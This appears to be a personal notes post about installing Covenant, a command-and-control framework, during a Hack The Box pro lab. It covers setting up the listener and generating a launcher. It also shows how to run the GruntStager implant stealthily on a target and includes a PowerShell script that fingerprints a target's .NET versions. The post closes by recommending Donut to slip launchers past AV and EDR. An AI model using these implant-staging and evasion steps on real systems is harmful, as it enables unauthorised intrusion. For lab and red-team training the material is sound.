In light of being advised to use Covenant during the Cybernetics pro labs from HTB and absolutely falling in love with its power, simplicity, and organisation, I decided to type up some notes for myself regarding the installation and basic setup.
See Covenant's Installation and Startup documentation for more details, including running it with Docker.
```shell
# Clone Covenant with its submodules (the Grunt sources live in submodules).
git clone --recurse-submodules https://github.com/cobbr/Covenant

# Add Microsoft's package feed (Ubuntu 19.04 shown) and install the .NET Core 2.2 SDK,
# which this version of Covenant builds against.
wget -q https://packages.microsoft.com/config/ubuntu/19.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb
sudo apt-get update
sudo apt-get install apt-transport-https
sudo apt-get update
sudo apt-get install dotnet-sdk-2.2

# Build and run the Covenant server.
cd Covenant/Covenant
dotnet build
dotnet run
```
Once running, Covenant's web interface listens on https://0.0.0.0:7443/ (all interfaces, TCP 7443). The certificate is self-signed, so expect a browser warning, and since it binds to every interface you should firewall the port to your own address when the box is reachable from anywhere else.
The beauty of Covenant listeners is that you only need to create one: every Grunt can call back to the same listener, so there is no more running out of valid ports for reverse shells when you're pivoting through six hosts.
After starting a listener you need to create a launcher; the launcher is the payload that gets executed on the target host. When it runs it starts a Grunt (Covenant's implant), which connects back to the listener and shows up in the Covenant interface.
The launcher tab contains a list of the various launchers that can be generated for the desired listener:
The Binary Launcher page, for example:
I found that the Net35 .NET Framework version for the Binary Launcher worked on some hosts but not on others; the Net40 version, however, had no problems whatsoever:
After clicking Download you should have a GruntStager.exe file on your local machine. Upload it to the target and run `start /B C:\programdata\GruntStager.exe` (the /B flag runs it in the background without opening a new window).
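A likely reason for the Net35/Net40 difference noted above is that .NET Framework 3.5 (CLR 2.0) is an optional feature that is not installed by default on Windows 8 / Server 2012 and later, while a 4.x CLR is present on every current Windows build. The following PowerShell is an added example, not code from the original post or from the Covenant project: it reads the documented .NET Framework setup registry keys on a target so you can choose the launcher version before uploading the stager. The function name Get-GruntLauncherTarget is my own.

```powershell
# Added example (not from the original post or the Covenant project).
# Reports which .NET Framework versions a Windows host has installed and
# recommends the matching Covenant Binary Launcher version (Net35 or Net40).
function Get-GruntLauncherTarget {
    $ndp = 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP'

    # .NET Framework 3.5 sets Install=1 under NDP\v3.5 once the feature is enabled.
    $v35   = Get-ItemProperty -Path "$ndp\v3.5" -ErrorAction SilentlyContinue
    $has35 = ($null -ne $v35) -and ($v35.Install -eq 1)

    # .NET Framework 4.0+ sets Install=1 under NDP\v4\Full. The Release DWORD
    # only exists from 4.5 onwards, so it is reported but not required.
    $v4      = Get-ItemProperty -Path "$ndp\v4\Full" -ErrorAction SilentlyContinue
    $has40   = ($null -ne $v4) -and ($v4.Install -eq 1)
    $release = if ($has40) { $v4.Release } else { $null }

    # Prefer Net40: a 4.x CLR ships with every supported Windows version, whereas
    # 3.5 is an optional feature on Windows 8 / Server 2012 and later.
    $launcher = if ($has40) { 'Net40' } elseif ($has35) { 'Net35' } else { 'none' }

    [pscustomobject]@{
        ComputerName   = $env:COMPUTERNAME
        Net35Installed = $has35
        Net40Installed = $has40
        Net4Release    = $release
        Launcher       = $launcher
    }
}

Get-GruntLauncherTarget | Format-List
```

Run this from whatever foothold you already have on the target (or remotely with Invoke-Command) before generating the launcher; if it reports Launcher = Net40, the Net35 stager may still work but only where the optional 3.5 feature happens to be enabled.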
If endpoint protection is up to date then the standard launchers will generally get picked up. Donut, however, converts a .NET assembly such as the Grunt stager into position-independent shellcode that can be embedded in your own loader, which gives you a launcher that is much harder for AV and EDR to catch. Harder is not undetectable: the result still has to be delivered and loaded by code that behavioural detections can flag, so test it against the same product the target is running before relying on it.